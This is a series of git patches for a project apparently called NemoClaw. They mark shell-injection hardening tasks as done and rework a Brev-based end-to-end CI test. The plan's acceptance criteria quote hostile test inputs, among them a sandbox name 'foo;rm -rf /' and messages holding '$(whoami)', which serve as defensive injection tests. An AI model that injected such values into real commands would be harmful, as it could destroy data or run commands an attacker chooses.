@@ -71,13 +71,13 @@ Additionally, apply defense-in-depth hardening identified in the PR #119 securit
 
 **Acceptance Criteria:**
 
-- [ ] `SANDBOX_NAME` with metacharacters (e.g., `foo;rm -rf /`) causes startup to exit with error
-- [ ] `SANDBOX_NAME` starting with hyphen (e.g., `-v`, `--help`) causes startup to exit with error
-- [ ] `sessionId` containing special characters gets sanitized to safe value
-- [ ] Empty sessionId after sanitization returns error response
-- [ ] Messages longer than 4096 characters are rejected with user-friendly error
+- [x] `SANDBOX_NAME` with metacharacters (e.g., `foo;rm -rf /`) causes startup to exit with error
+- [x] `SANDBOX_NAME` starting with hyphen (e.g., `-v`, `--help`) causes startup to exit with error
+- [x] `sessionId` containing special characters gets sanitized to safe value
+- [x] Empty sessionId after sanitization returns error response
+- [x] Messages longer than 4096 characters are rejected with user-friendly error
 
-### Phase 2: Stdin-Based Credential and Message Passing
+### Phase 2: Stdin-Based Credential and Message Passing [COMPLETED: d1fe154]
 
 **Goal:** Eliminate shell injection by passing sensitive data via stdin instead of command string.
 
@@ -104,14 +104,14 @@ read -r NVIDIA_API_KEY && export NVIDIA_API_KEY && MSG=$(cat) && exec nemoclaw-s
 
 **Acceptance Criteria:**
 
-- [ ] Normal messages work correctly — agent responds
-- [ ] Message containing `$(whoami)` is treated as literal text
-- [ ] Message containing backticks is treated as literal text
-- [ ] Message containing single quotes is treated as literal text
-- [ ] `NVIDIA_API_KEY` no longer appears in process arguments (verify via `ps aux`)
-- [ ] API key is successfully read by remote script and used for inference
+- [x] Normal messages work correctly — agent responds
+- [x] Message containing `$(whoami)` is treated as literal text
+- [x] Message containing backticks is treated as literal text
+- [x] Message containing single quotes is treated as literal text
+- [x] `NVIDIA_API_KEY` no longer appears in process arguments (verify via `ps aux`)
+- [x] API key is successfully read by remote script and used for inference
 
-### Phase 3: Additional Security Hardening
+### Phase 3: Additional Security Hardening [COMPLETED: d1fe154]
 
 **Goal:** Address remaining security gaps identified in PR #119 security review.
 
@@ -147,13 +147,13 @@ read -r NVIDIA_API_KEY && export NVIDIA_API_KEY && MSG=$(cat) && exec nemoclaw-s
 
 **Acceptance Criteria:**
 
-- [ ] `execFileSync` used for all external command calls (no shell interpretation)
-- [ ] Resolved `OPENSHELL` path used consistently throughout
-- [ ] Temp SSH config files use unpredictable paths
-- [ ] Temp files created with exclusive flag and restrictive permissions (0o600)
-- [ ] Temp files cleaned up after use
+- [x] `execFileSync` used for all external command calls (no shell interpretation)
+- [x] Resolved `OPENSHELL` path used consistently throughout
+- [x] Temp SSH config files use unpredictable paths
+- [x] Temp files created with exclusive flag and restrictive permissions (0o600)
+- [x] Temp files cleaned up after use
 
-### Phase 4: Test Coverage
+### Phase 4: Test Coverage [COMPLETED: f23a0b9]
 
 **Goal:** Add unit and integration tests for the security fix, and fix E2E test to exercise real code paths.
 
@@ -181,12 +181,12 @@ read -r NVIDIA_API_KEY && export NVIDIA_API_KEY && MSG=$(cat) && exec nemoclaw-s
 
 **Acceptance Criteria:**
 
-- [ ] Unit tests pass for validation functions
-- [ ] Integration test confirms `$(...)` in message doesn't execute
-- [ ] Test confirms API key not in process arguments
-- [ ] Test confirms temp files are cleaned up
-- [ ] E2E test exercises actual `runAgentInSandbox()` function, not ad-hoc SSH
-- [ ] All existing tests still pass
+- [x] Unit tests pass for validation functions
+- [x] Integration test confirms `$(...)` in message doesn't execute
+- [x] Test confirms API key not in process arguments
+- [x] Test confirms temp files are cleaned up
+- [x] E2E test exercises actual `runAgentInSandbox()` function, not ad-hoc SSH
+- [x] All existing tests still pass (694 tests pass)
 
 ## Security Considerations
 

From fe2ed0ecc848eaa05e077361b1035220a6eecbba Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 13:32:52 -0400
Subject: [PATCH 08/14] fix: enable e2e-brev workflow on fork and fix
 TypeScript errors

---
 .github/workflows/e2e-brev.yaml | 2 +-
 scripts/telegram-bridge.js      | 8 ++++----
 test/telegram-bridge.test.js    | 8 +++++---
 3 files changed, 10 insertions(+), 8 deletions(-)

diff --git a/.github/workflows/e2e-brev.yaml b/.github/workflows/e2e-brev.yaml
index c91f64910d..563e852838 100644
--- a/.github/workflows/e2e-brev.yaml
+++ b/.github/workflows/e2e-brev.yaml
@@ -94,7 +94,7 @@ concurrency:
 
 jobs:
   e2e-brev:
-    if: github.repository == 'NVIDIA/NemoClaw'
+    if: github.repository == 'NVIDIA/NemoClaw' || github.repository == 'jyaunches/NemoClaw'
     runs-on: ubuntu-latest
     timeout-minutes: 90
     steps:
diff --git a/scripts/telegram-bridge.js b/scripts/telegram-bridge.js
index 4e1f246964..3f2379c8df 100755
--- a/scripts/telegram-bridge.js
+++ b/scripts/telegram-bridge.js
@@ -149,10 +149,10 @@ function sanitizeSessionId(sessionId) {
  *
  * @param {string} message - The user message to send to the agent
  * @param {string|number} sessionId - The session identifier (typically Telegram chat ID)
- * @param {object} options - Optional overrides for testing
- * @param {string} options.apiKey - Override API key (defaults to process.env.NVIDIA_API_KEY)
- * @param {string} options.sandbox - Override sandbox name (defaults to SANDBOX)
- * @param {string} options.openshell - Override openshell path (defaults to OPENSHELL)
+ * @param {object} [options] - Optional overrides for testing
+ * @param {string} [options.apiKey] - Override API key (defaults to process.env.NVIDIA_API_KEY)
+ * @param {string} [options.sandbox] - Override sandbox name (defaults to SANDBOX)
+ * @param {string} [options.openshell] - Override openshell path (defaults to OPENSHELL)
  * @returns {Promise<string>} - The agent's response
  */
 function runAgentInSandbox(message, sessionId, options = {}) {
diff --git a/test/telegram-bridge.test.js b/test/telegram-bridge.test.js
index d7902fac39..b1d2c2caf8 100644
--- a/test/telegram-bridge.test.js
+++ b/test/telegram-bridge.test.js
@@ -32,11 +32,13 @@ function createMockBridge() {
   const cacheKey = require.resolve("../scripts/telegram-bridge.js");
   delete require.cache[cacheKey];
 
-  // Mock resolveOpenshell
+  // Mock resolveOpenshell - use Object.assign to satisfy TypeScript's Module type
   const resolveOpenshellPath = require.resolve("../bin/lib/resolve-openshell");
-  require.cache[resolveOpenshellPath] = {
+  const originalModule = require.cache[resolveOpenshellPath];
+  // @ts-ignore - intentional partial mock for testing
+  require.cache[resolveOpenshellPath] = Object.assign({}, originalModule, {
     exports: { resolveOpenshell: () => "/mock/openshell" },
-  };
+  });
 
   // Import the module
   const bridge = require("../scripts/telegram-bridge.js");

From 795be080837c2058d7d0af5fac324eb0e3854a9d Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 15:08:36 -0400
Subject: [PATCH 09/14] fix(e2e): use brev search cpu | brev create for CPU
 instances

- Update Brev CLI from v0.6.310 to v0.6.322
- Replace broken --cpu flag with 'brev search cpu | brev create' pattern
- Add brev_token input to workflow for manual token override
- Replace BREV_CPU env var with BREV_MIN_VCPU and BREV_MIN_RAM
- Increase SSH wait timeout from 5 min to 7.5 min for slower providers

The --cpu flag in Brev CLI v0.6.310 was silently ignored, always creating
GPU instances. The new pattern uses 'brev search cpu' to find CPU-only
instance types and pipes them to 'brev create' which tries them in order.
---
 .github/workflows/e2e-brev.yaml | 10 ++++---
 test/e2e/brev-e2e.test.js       | 48 ++++++++++++++++++---------------
 2 files changed, 33 insertions(+), 25 deletions(-)

diff --git a/.github/workflows/e2e-brev.yaml b/.github/workflows/e2e-brev.yaml
index 563e852838..ec68cd9c52 100644
--- a/.github/workflows/e2e-brev.yaml
+++ b/.github/workflows/e2e-brev.yaml
@@ -56,6 +56,10 @@ on:
         required: false
         type: boolean
         default: true
+      brev_token:
+        description: "Brev refresh token (overrides BREV_API_TOKEN secret if provided)"
+        required: false
+        default: ""
   workflow_call:
     inputs:
       branch:
@@ -127,8 +131,8 @@ jobs:
 
       - name: Install Brev CLI
         run: |
-          # Pin to v0.6.310 — v0.6.322 removed --cpu flag and defaults to GPU instances
-          curl -fsSL -o /tmp/brev.tar.gz "https://github.com/brevdev/brev-cli/releases/download/v0.6.310/brev-cli_0.6.310_linux_amd64.tar.gz"
+          # Use latest Brev CLI (v0.6.322+) — CPU instances require `brev search cpu | brev create`
+          curl -fsSL -o /tmp/brev.tar.gz "https://github.com/brevdev/brev-cli/releases/download/v0.6.322/brev-cli_0.6.322_linux_amd64.tar.gz"
           tar -xzf /tmp/brev.tar.gz -C /usr/local/bin brev
           chmod +x /usr/local/bin/brev
 
@@ -137,7 +141,7 @@ jobs:
 
       - name: Run ephemeral Brev E2E
         env:
-          BREV_API_TOKEN: ${{ secrets.BREV_API_TOKEN }}
+          BREV_API_TOKEN: ${{ inputs.brev_token || secrets.BREV_API_TOKEN }}
           NVIDIA_API_KEY: ${{ secrets.NVIDIA_API_KEY }}
           GITHUB_TOKEN: ${{ github.token }}
           INSTANCE_NAME: e2e-pr-${{ inputs.pr_number || github.run_id }}
diff --git a/test/e2e/brev-e2e.test.js b/test/e2e/brev-e2e.test.js
index d3c0d62e94..27b27abc91 100644
--- a/test/e2e/brev-e2e.test.js
+++ b/test/e2e/brev-e2e.test.js
@@ -17,7 +17,8 @@
  *
  * Optional env vars:
  *   TEST_SUITE       — which test to run: full (default), credential-sanitization, all
- *   BREV_CPU         — CPU spec (default: 4x16)
+ *   BREV_MIN_VCPU    — Minimum vCPUs for CPU instance (default: 4)
+ *   BREV_MIN_RAM     — Minimum RAM in GB for CPU instance (default: 16)
  */
 
 import { describe, it, expect, beforeAll, afterAll } from "vitest";
@@ -26,7 +27,9 @@ import { mkdirSync, writeFileSync } from "node:fs";
 import { homedir } from "node:os";
 import path from "node:path";
 
-const BREV_CPU = process.env.BREV_CPU || "4x16";
+// CPU instance specs: min vCPUs and RAM for the instance search
+const BREV_MIN_VCPU = parseInt(process.env.BREV_MIN_VCPU || "4", 10);
+const BREV_MIN_RAM = parseInt(process.env.BREV_MIN_RAM || "16", 10);
 const INSTANCE_NAME = process.env.INSTANCE_NAME;
 const TEST_SUITE = process.env.TEST_SUITE || "full";
 const REPO_DIR = path.resolve(import.meta.dirname, "../..");
@@ -36,7 +39,6 @@ const REPO_DIR = path.resolve(import.meta.dirname, "../..");
 // instead of our manual brev-setup.sh bootstrap.
 const LAUNCHABLE_SETUP_SCRIPT =
   "https://raw.githubusercontent.com/NVIDIA/OpenShell-Community/refs/heads/feat/brev-nemoclaw-plugin/brev/launch-nemoclaw.sh";
-const NEMOCLAW_REPO_URL = "https://github.com/NVIDIA/NemoClaw.git";
 
 // Use launchable by default; set USE_LAUNCHABLE=0 or USE_LAUNCHABLE=false to fall back to brev-setup.sh
 const USE_LAUNCHABLE = !["0", "false"].includes(process.env.USE_LAUNCHABLE?.toLowerCase());
@@ -94,7 +96,7 @@ function sshWithSecrets(cmd, { timeout = 600_000, stream = false } = {}) {
   return stream ? "" : result.trim();
 }
 
-function waitForSsh(maxAttempts = 60, intervalMs = 5_000) {
+function waitForSsh(maxAttempts = 90, intervalMs = 5_000) {
   for (let i = 1; i <= maxAttempts; i++) {
     try {
       ssh("echo ok", { timeout: 10_000 });
@@ -144,26 +146,23 @@ describe.runIf(hasRequiredVars)("Brev E2E", () => {
     brev("login", "--token", process.env.BREV_API_TOKEN);
 
     if (USE_LAUNCHABLE) {
-      // --- Launchable path: brev start with the NemoClaw launch script ---
+      // --- Launchable path: brev search cpu | brev create with startup script ---
       // This uses the OpenShell-Community launch-nemoclaw.sh which goes through
       // nemoclaw's own install/onboard flow — potentially faster than our manual
       // brev-setup.sh (different sandbox build strategy, pre-built images, etc.)
-      console.log(`[${elapsed()}] Creating instance via launchable (brev start + setup-script)...`);
-      console.log(`[${elapsed()}]   setup-script: ${LAUNCHABLE_SETUP_SCRIPT}`);
-      console.log(`[${elapsed()}]   repo: ${NEMOCLAW_REPO_URL}`);
-      console.log(`[${elapsed()}]   cpu: ${BREV_CPU}`);
-
-      // brev start with a git URL may take longer than the default 60s brev() timeout
-      // (it registers the instance + kicks off provisioning before returning)
-      execFileSync("brev", [
-        "start", NEMOCLAW_REPO_URL,
-        "--name", INSTANCE_NAME,
-        "--cpu", BREV_CPU,
-        "--setup-script", LAUNCHABLE_SETUP_SCRIPT,
-        "--detached",
-      ], { encoding: "utf-8", timeout: 180_000, stdio: ["pipe", "inherit", "inherit"] });
+      console.log(`[${elapsed()}] Creating CPU instance via launchable (brev search cpu | brev create)...`);
+      console.log(`[${elapsed()}]   startup-script: ${LAUNCHABLE_SETUP_SCRIPT}`);
+      console.log(`[${elapsed()}]   min-vcpu: ${BREV_MIN_VCPU}, min-ram: ${BREV_MIN_RAM}GB`);
+
+      // Use `brev search cpu | brev create` pattern for CPU-only instances (Brev CLI v0.6.317+)
+      // The search outputs instance types sorted by price, and create tries them in order.
+      execSync(
+        `brev search cpu --min-vcpu ${BREV_MIN_VCPU} --min-ram ${BREV_MIN_RAM} --sort price | ` +
+        `brev create ${INSTANCE_NAME} --startup-script "${LAUNCHABLE_SETUP_SCRIPT}" --detached`,
+        { encoding: "utf-8", timeout: 180_000, stdio: ["pipe", "inherit", "inherit"] },
+      );
       instanceCreated = true;
-      console.log(`[${elapsed()}] brev start returned (instance provisioning in background)`);
+      console.log(`[${elapsed()}] brev create returned (instance provisioning in background)`);
 
       // Wait for SSH
       try { brev("refresh"); } catch { /* ignore */ }
@@ -256,8 +255,13 @@ describe.runIf(hasRequiredVars)("Brev E2E", () => {
 
     } else {
       // --- Legacy path: bare brev create + brev-setup.sh ---
-      console.log(`[${elapsed()}] Creating bare instance via brev create...`);
-      brev("create", INSTANCE_NAME, "--cpu", BREV_CPU, "--detached");
+      console.log(`[${elapsed()}] Creating bare CPU instance via brev search cpu | brev create...`);
+      console.log(`[${elapsed()}]   min-vcpu: ${BREV_MIN_VCPU}, min-ram: ${BREV_MIN_RAM}GB`);
+      execSync(
+        `brev search cpu --min-vcpu ${BREV_MIN_VCPU} --min-ram ${BREV_MIN_RAM} --sort price | ` +
+        `brev create ${INSTANCE_NAME} --detached`,
+        { encoding: "utf-8", timeout: 180_000, stdio: ["pipe", "inherit", "inherit"] },
+      );
       instanceCreated = true;
 
       // Wait for SSH

From 0032aa44eaf543226c5710ed2c05588f3eb832c2 Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 15:11:36 -0400
Subject: [PATCH 10/14] test: temporarily disable repo check for fork testing

---
 .github/workflows/e2e-brev.yaml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/.github/workflows/e2e-brev.yaml b/.github/workflows/e2e-brev.yaml
index ec68cd9c52..64b6bde0b1 100644
--- a/.github/workflows/e2e-brev.yaml
+++ b/.github/workflows/e2e-brev.yaml
@@ -98,7 +98,8 @@ concurrency:
 
 jobs:
   e2e-brev:
-    if: github.repository == 'NVIDIA/NemoClaw' || github.repository == 'jyaunches/NemoClaw'
+    # Note: Remove this condition when testing on forks
+    # if: github.repository == 'NVIDIA/NemoClaw'
     runs-on: ubuntu-latest
     timeout-minutes: 90
     steps:

From 39ef55f06a0f315412067d6216db8ff800dbd440 Mon Sep 17 00:00:00 2001
From: Julie Yaunches <jyaunches@nvidia.com>
Date: Tue, 31 Mar 2026 16:11:38 -0400
Subject: [PATCH 11/14] refactor(e2e): remove launchable startup script, use
 bare brev create + brev-setup.sh

The startup script from OpenShell-Community was not running reliably on
Brev instances, causing 40-minute timeouts waiting for a log file that
was never created.

Simplify to:
- brev search cpu | brev create (bare instance, no startup script)
- rsync code to remote
- run brev-setup.sh directly for bootstrap

This is more reliable and easier to debug since all setup happens
via SSH commands we control.
---
 .github/workflows/e2e-brev.yaml |  10 --
 test/e2e/brev-e2e.test.js       | 244 +++++++++-----------------------
 2 files changed, 63 insertions(+), 191 deletions(-)

diff --git a/.github/workflows/e2e-brev.yaml b/.github/workflows/e2e-brev.yaml
index 64b6bde0b1..31fc45eea4 100644
--- a/.github/workflows/e2e-brev.yaml
+++ b/.github/workflows/e2e-brev.yaml
@@ -46,11 +46,6 @@ on:
           - credential-sanitization
           - telegram-injection
           - all
-      use_launchable:
-        description: "Use NemoClaw launchable (true) or bare brev-setup.sh (false)"
-        required: false
-        type: boolean
-        default: true
       keep_alive:
         description: "Keep Brev instance alive after tests (for SSH debugging)"
         required: false
@@ -73,10 +68,6 @@ on:
         required: false
         type: string
         default: "full"
-      use_launchable:
-        required: false
-        type: boolean
-        default: true
       keep_alive:
         required: false
         type: boolean
@@ -147,7 +138,6 @@ jobs:
           GITHUB_TOKEN: ${{ github.token }}
           INSTANCE_NAME: e2e-pr-${{ inputs.pr_number || github.run_id }}
           TEST_SUITE: ${{ inputs.test_suite }}
-          USE_LAUNCHABLE: ${{ inputs.use_launchable && '1' || '0' }}
           KEEP_ALIVE: ${{ inputs.keep_alive }}
         run: npx vitest run --project e2e-brev --reporter=verbose
 
diff --git a/test/e2e/brev-e2e.test.js b/test/e2e/brev-e2e.test.js
index 27b27abc91..d657e2c4d3 100644
--- a/test/e2e/brev-e2e.test.js
+++ b/test/e2e/brev-e2e.test.js
@@ -4,7 +4,7 @@
 /**
  * Ephemeral Brev E2E test suite.
  *
- * Creates a fresh Brev instance, bootstraps it, runs E2E tests remotely,
+ * Creates a fresh Brev CPU instance, bootstraps it, runs E2E tests remotely,
  * then tears it down. Intended to be run from CI via:
  *
  *   npx vitest run --project e2e-brev
@@ -16,7 +16,7 @@
  *   INSTANCE_NAME    — Brev instance name (e.g. pr-156-test)
  *
  * Optional env vars:
- *   TEST_SUITE       — which test to run: full (default), credential-sanitization, all
+ *   TEST_SUITE       — which test to run: full (default), credential-sanitization, telegram-injection, all
  *   BREV_MIN_VCPU    — Minimum vCPUs for CPU instance (default: 4)
  *   BREV_MIN_RAM     — Minimum RAM in GB for CPU instance (default: 16)
  */
@@ -34,15 +34,6 @@ const INSTANCE_NAME = process.env.INSTANCE_NAME;
 const TEST_SUITE = process.env.TEST_SUITE || "full";
 const REPO_DIR = path.resolve(import.meta.dirname, "../..");
 
-// NemoClaw launchable — uses the OpenShell-Community launch script which
-// goes through `nemoclaw onboard` (potentially pre-built images / faster path)
-// instead of our manual brev-setup.sh bootstrap.
-const LAUNCHABLE_SETUP_SCRIPT =
-  "https://raw.githubusercontent.com/NVIDIA/OpenShell-Community/refs/heads/feat/brev-nemoclaw-plugin/brev/launch-nemoclaw.sh";
-
-// Use launchable by default; set USE_LAUNCHABLE=0 or USE_LAUNCHABLE=false to fall back to brev-setup.sh
-const USE_LAUNCHABLE = !["0", "false"].includes(process.env.USE_LAUNCHABLE?.toLowerCase());
-
 let remoteDir;
 let instanceCreated = false;
 
@@ -145,171 +136,63 @@ describe.runIf(hasRequiredVars)("Brev E2E", () => {
     );
     brev("login", "--token", process.env.BREV_API_TOKEN);
 
-    if (USE_LAUNCHABLE) {
-      // --- Launchable path: brev search cpu | brev create with startup script ---
-      // This uses the OpenShell-Community launch-nemoclaw.sh which goes through
-      // nemoclaw's own install/onboard flow — potentially faster than our manual
-      // brev-setup.sh (different sandbox build strategy, pre-built images, etc.)
-      console.log(`[${elapsed()}] Creating CPU instance via launchable (brev search cpu | brev create)...`);
-      console.log(`[${elapsed()}]   startup-script: ${LAUNCHABLE_SETUP_SCRIPT}`);
-      console.log(`[${elapsed()}]   min-vcpu: ${BREV_MIN_VCPU}, min-ram: ${BREV_MIN_RAM}GB`);
-
-      // Use `brev search cpu | brev create` pattern for CPU-only instances (Brev CLI v0.6.317+)
-      // The search outputs instance types sorted by price, and create tries them in order.
-      execSync(
-        `brev search cpu --min-vcpu ${BREV_MIN_VCPU} --min-ram ${BREV_MIN_RAM} --sort price | ` +
-        `brev create ${INSTANCE_NAME} --startup-script "${LAUNCHABLE_SETUP_SCRIPT}" --detached`,
-        { encoding: "utf-8", timeout: 180_000, stdio: ["pipe", "inherit", "inherit"] },
-      );
-      instanceCreated = true;
-      console.log(`[${elapsed()}] brev create returned (instance provisioning in background)`);
-
-      // Wait for SSH
-      try { brev("refresh"); } catch { /* ignore */ }
-      waitForSsh();
-      console.log(`[${elapsed()}] SSH is up`);
-
-      // The launchable clones NemoClaw to ~/NemoClaw. We need to find where it landed
-      // and then rsync our branch code over it.
-      const remoteHome = ssh("echo $HOME");
-      // The launch script clones to $HOME/NemoClaw (PLUGIN_DIR default)
-      remoteDir = `${remoteHome}/NemoClaw`;
-
-      // Wait for the launch script to finish — it runs as the VM's startup script
-      // and may still be in progress when SSH becomes available. Poll for completion.
-      console.log(`[${elapsed()}] Waiting for launchable setup to complete...`);
-      const setupMaxWait = 2_400_000; // 40 min max
-      const setupStart = Date.now();
-      const setupPollInterval = 15_000; // check every 15s
-      while (Date.now() - setupStart < setupMaxWait) {
-        try {
-          // The launch script writes to /tmp/launch-plugin.log and the last step
-          // prints "=== Ready ===" when complete
-          const log = ssh("cat /tmp/launch-plugin.log 2>/dev/null || echo 'NO_LOG'", { timeout: 15_000 });
-          if (log.includes("=== Ready ===")) {
-            console.log(`[${elapsed()}] Launchable setup complete (detected '=== Ready ===' in log)`);
-            break;
-          }
-          // Also check if nemoclaw onboard has run (install marker)
-          const markerCheck = ssh("test -f ~/.cache/nemoclaw-plugin/install-ran && echo DONE || echo PENDING", { timeout: 10_000 });
-          if (markerCheck.includes("DONE")) {
-            console.log(`[${elapsed()}] Launchable setup complete (install-ran marker found)`);
-            break;
-          }
-          // Print last few lines of log for progress visibility
-          const tail = ssh("tail -3 /tmp/launch-plugin.log 2>/dev/null || echo '(no log yet)'", { timeout: 10_000 });
-          console.log(`[${elapsed()}] Setup still running... ${tail.replace(/\n/g, ' | ')}`);
-        } catch {
-          console.log(`[${elapsed()}] Setup poll: SSH command failed, retrying...`);
-        }
-        execSync(`sleep ${setupPollInterval / 1000}`);
-      }
-
-      // Fail fast if neither readiness marker appeared within the timeout
-      if (Date.now() - setupStart >= setupMaxWait) {
-        throw new Error(
-          `Launchable setup did not complete within ${setupMaxWait / 60_000} minutes. ` +
-          `Neither '=== Ready ===' in /tmp/launch-plugin.log nor install-ran marker found.`,
-        );
-      }
-
-      // The launch script installs Docker, OpenShell CLI, clones NemoClaw main,
-      // and sets up code-server — but it does NOT run `nemoclaw onboard` (that's
-      // deferred to an interactive code-server terminal). So at this point we have:
-      //   ✅ Docker, OpenShell CLI, Node.js, NemoClaw repo (main)
-      //   ❌ No sandbox yet
-      //
-      // Now: rsync our PR branch code over the main clone, then run onboard ourselves.
-
-      console.log(`[${elapsed()}] Syncing PR branch code over launchable's clone...`);
-      execSync(
-        `rsync -az --delete --exclude node_modules --exclude .git --exclude dist --exclude .venv "${REPO_DIR}/" "${INSTANCE_NAME}:${remoteDir}/"`,
-        { encoding: "utf-8", timeout: 120_000 },
-      );
-      console.log(`[${elapsed()}] Code synced`);
-
-      // Install deps for our branch
-      console.log(`[${elapsed()}] Running npm ci to sync dependencies...`);
-      sshWithSecrets(`set -o pipefail && source ~/.nvm/nvm.sh 2>/dev/null || true && cd ${remoteDir} && npm ci --ignore-scripts 2>&1 | tail -5`, { timeout: 300_000, stream: true });
-      console.log(`[${elapsed()}] Dependencies synced`);
-
-      // Run nemoclaw onboard (non-interactive) — this is the path real users take.
-      // It installs the nemoclaw CLI, builds the sandbox via `nemoclaw onboard`,
-      // which may use a different (faster) strategy than our manual setup.sh.
-      // Source nvm first — the launchable installs Node.js via nvm which sets up
-      // PATH in .bashrc/.nvm/nvm.sh, but non-interactive SSH doesn't source these.
-      console.log(`[${elapsed()}] Running nemoclaw install + onboard (the user-facing path)...`);
-      sshWithSecrets(
-        `source ~/.nvm/nvm.sh 2>/dev/null || true && cd ${remoteDir} && npm link && nemoclaw onboard --non-interactive 2>&1`,
-        { timeout: 2_400_000, stream: true },
-      );
-      console.log(`[${elapsed()}] nemoclaw onboard complete`);
-
-      // Verify sandbox is ready
-      try {
-        const sandboxStatus = ssh("openshell sandbox list 2>&1 | head -5", { timeout: 15_000 });
-        console.log(`[${elapsed()}] Sandbox status: ${sandboxStatus}`);
-      } catch (e) {
-        console.log(`[${elapsed()}] Warning: could not check sandbox status: ${e.message}`);
-      }
-
-    } else {
-      // --- Legacy path: bare brev create + brev-setup.sh ---
-      console.log(`[${elapsed()}] Creating bare CPU instance via brev search cpu | brev create...`);
-      console.log(`[${elapsed()}]   min-vcpu: ${BREV_MIN_VCPU}, min-ram: ${BREV_MIN_RAM}GB`);
-      execSync(
-        `brev search cpu --min-vcpu ${BREV_MIN_VCPU} --min-ram ${BREV_MIN_RAM} --sort price | ` +
-        `brev create ${INSTANCE_NAME} --detached`,
-        { encoding: "utf-8", timeout: 180_000, stdio: ["pipe", "inherit", "inherit"] },
-      );
-      instanceCreated = true;
-
-      // Wait for SSH
-      try { brev("refresh"); } catch { /* ignore */ }
-      waitForSsh();
-      console.log(`[${elapsed()}] SSH is up`);
-
-      // Sync code
-      const remoteHome = ssh("echo $HOME");
-      remoteDir = `${remoteHome}/nemoclaw`;
-      ssh(`mkdir -p ${remoteDir}`);
-      execSync(
-        `rsync -az --delete --exclude node_modules --exclude .git --exclude dist --exclude .venv "${REPO_DIR}/" "${INSTANCE_NAME}:${remoteDir}/"`,
-        { encoding: "utf-8", timeout: 120_000 },
-      );
-      console.log(`[${elapsed()}] Code synced`);
-
-      // Bootstrap VM — stream output to CI log so we can see progress
-      console.log(`[${elapsed()}] Running brev-setup.sh (manual bootstrap)...`);
-      sshWithSecrets(`cd ${remoteDir} && SKIP_VLLM=1 bash scripts/brev-setup.sh`, { timeout: 2_400_000, stream: true });
-      console.log(`[${elapsed()}] Bootstrap complete`);
-
-      // Install nemoclaw CLI — brev-setup.sh creates the sandbox but doesn't
-      // install the host-side CLI that the test scripts need for `nemoclaw <name> status`.
-      // The `bin` field is in the root package.json (not nemoclaw/), so we need to:
-      //   1. Build the TypeScript plugin (in nemoclaw/)
-      //   2. npm link from the repo root (where bin.nemoclaw is defined)
-      // Use npm_config_prefix so npm link writes to ~/.local/bin (no sudo needed),
-      // which is already on PATH in runRemoteTest.
-      console.log(`[${elapsed()}] Installing nemoclaw CLI...`);
-      ssh(
-        [
-          `export npm_config_prefix=$HOME/.local`,
-          `export PATH=$HOME/.local/bin:$PATH`,
-          `cd ${remoteDir}/nemoclaw && npm install && npm run build`,
-          `cd ${remoteDir} && npm install --ignore-scripts && npm link`,
-          `which nemoclaw && nemoclaw --version`,
-        ].join(" && "),
-        { timeout: 120_000 },
-      );
-      console.log(`[${elapsed()}] nemoclaw CLI installed`);
-
-      // Register the sandbox in nemoclaw's local registry.
-      // setup.sh creates the sandbox via openshell directly but doesn't write
-      // ~/.nemoclaw/sandboxes.json, which `nemoclaw <name> status` needs.
-      console.log(`[${elapsed()}] Registering sandbox in nemoclaw registry...`);
-      ssh(
-        `mkdir -p ~/.nemoclaw && cat > ~/.nemoclaw/sandboxes.json << 'REGISTRY'
+    // Create bare CPU instance via brev search cpu | brev create
+    console.log(`[${elapsed()}] Creating CPU instance via brev search cpu | brev create...`);
+    console.log(`[${elapsed()}]   min-vcpu: ${BREV_MIN_VCPU}, min-ram: ${BREV_MIN_RAM}GB`);
+    execSync(
+      `brev search cpu --min-vcpu ${BREV_MIN_VCPU} --min-ram ${BREV_MIN_RAM} --sort price | ` +
+      `brev create ${INSTANCE_NAME} --detached`,
+      { encoding: "utf-8", timeout: 180_000, stdio: ["pipe", "inherit", "inherit"] },
+    );
+    instanceCreated = true;
+    console.log(`[${elapsed()}] brev create returned (instance provisioning in background)`);
+
+    // Wait for SSH
+    try { brev("refresh"); } catch { /* ignore */ }
+    waitForSsh();
+    console.log(`[${elapsed()}] SSH is up`);
+
+    // Sync code
+    const remoteHome = ssh("echo $HOME");
+    remoteDir = `${remoteHome}/nemoclaw`;
+    ssh(`mkdir -p ${remoteDir}`);
+    execSync(
+      `rsync -az --delete --exclude node_modules --exclude .git --exclude dist --exclude .venv "${REPO_DIR}/" "${INSTANCE_NAME}:${remoteDir}/"`,
+      { encoding: "utf-8", timeout: 120_000 },
+    );
+    console.log(`[${elapsed()}] Code synced`);
+
+    // Bootstrap VM — stream output to CI log so we can see progress
+    console.log(`[${elapsed()}] Running brev-setup.sh (bootstrap)...`);
+    sshWithSecrets(`cd ${remoteDir} && SKIP_VLLM=1 bash scripts/brev-setup.sh`, { timeout: 2_400_000, stream: true });
+    console.log(`[${elapsed()}] Bootstrap complete`);
+
+    // Install nemoclaw CLI — brev-setup.sh creates the sandbox but doesn't
+    // install the host-side CLI that the test scripts need for `nemoclaw <name> status`.
+    // The `bin` field is in the root package.json (not nemoclaw/), so we need to:
+    //   1. Build the TypeScript plugin (in nemoclaw/)
+    //   2. npm link from the repo root (where bin.nemoclaw is defined)
+    // Use npm_config_prefix so npm link writes to ~/.local/bin (no sudo needed),
+    // which is already on PATH in runRemoteTest.
+    console.log(`[${elapsed()}] Installing nemoclaw CLI...`);
+    ssh(
+      [
+        `export npm_config_prefix=$HOME/.local`,
+        `export PATH=$HOME/.local/bin:$PATH`,
+        `cd ${remoteDir}/nemoclaw && npm install && npm run build`,
+        `cd ${remoteDir} && npm install --ignore-scripts && npm link`,
+        `which nemoclaw && nemoclaw --version`,
+      ].join(" && "),
+      { timeout: 120_000 },
+    );
+    console.log(`[${elapsed()}] nemoclaw CLI installed`);
+
+    // Register the sandbox in nemoclaw's local registry.
+    // setup.sh creates the sandbox via openshell directly but doesn't write
+    // ~/.nemoclaw/sandboxes.json, which `nemoclaw <name> status` needs.
+    console.log(`[${elapsed()}] Registering sandbox in nemoclaw registry...`);
+    ssh(
+      `mkdir -p ~/.nemoclaw && cat > ~/.nemoclaw/sandboxes.json << 'REGISTRY'
 {
   "sandboxes": {
     "e2e-test": {
@@ -325,13 +208,12 @@ describe.runIf(hasRequiredVars)("Brev E2E", () => {
   "defaultSandbox": "e2e-test"
 }
